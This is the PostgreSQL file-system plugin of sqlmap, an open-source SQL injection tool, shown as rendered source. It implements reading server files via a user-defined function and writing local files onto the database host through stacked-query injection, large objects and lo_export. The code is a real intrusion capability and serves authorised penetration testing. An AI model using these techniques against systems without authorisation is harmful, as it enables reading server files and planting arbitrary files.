CoCalc -- filesystem.py

GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/plugins/dbms/postgresql/filesystem.py
²⁹⁹² views
1
#!/usr/bin/env python
2

3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7

8
import os
9

10
from lib.core.common import randomInt
11
from lib.core.compat import xrange
12
from lib.core.data import kb
13
from lib.core.data import logger
14
from lib.core.exception import SqlmapUnsupportedFeatureException
15
from lib.core.settings import LOBLKSIZE
16
from lib.request import inject
17
from plugins.generic.filesystem import Filesystem as GenericFilesystem
18

19
class Filesystem(GenericFilesystem):
20
    def __init__(self):
21
        self.oid = None
22
        self.page = None
23

24
        GenericFilesystem.__init__(self)
25

26
    def stackedReadFile(self, remoteFile):
27
        if not kb.bruteMode:
28
            infoMsg = "fetching file: '%s'" % remoteFile
29
            logger.info(infoMsg)
30

31
        self.initEnv()
32

33
        return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
34

35
    def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
36
        errMsg = "PostgreSQL does not support file upload with UNION "
37
        errMsg += "query SQL injection technique"
38
        raise SqlmapUnsupportedFeatureException(errMsg)
39

40
    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
41
        localFileSize = os.path.getsize(localFile)
42
        content = open(localFile, "rb").read()
43

44
        self.oid = randomInt()
45
        self.page = 0
46

47
        self.createSupportTbl(self.fileTblName, self.tblField, "text")
48

49
        debugMsg = "create a new OID for a large object, it implicitly "
50
        debugMsg += "adds an entry in the large objects system table"
51
        logger.debug(debugMsg)
52

53
        # References:
54
        # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
55
        # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
56

57
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
58
        inject.goStacked("SELECT lo_create(%d)" % self.oid)
59
        inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
60

61
        for offset in xrange(0, localFileSize, LOBLKSIZE):
62
            fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
63
            sqlQueries = self.fileToSqlQueries(fcEncodedList)
64

65
            for sqlQuery in sqlQueries:
66
                inject.goStacked(sqlQuery)
67

68
            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
69
            inject.goStacked("DELETE FROM %s" % self.fileTblName)
70

71
            self.page += 1
72

73
        debugMsg = "exporting the OID %s file content to " % fileType
74
        debugMsg += "file '%s'" % remoteFile
75
        logger.debug(debugMsg)
76

77
        inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
78

79
        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
80

81
        inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
82

83
        return written
84

85
Product

Resources

Company
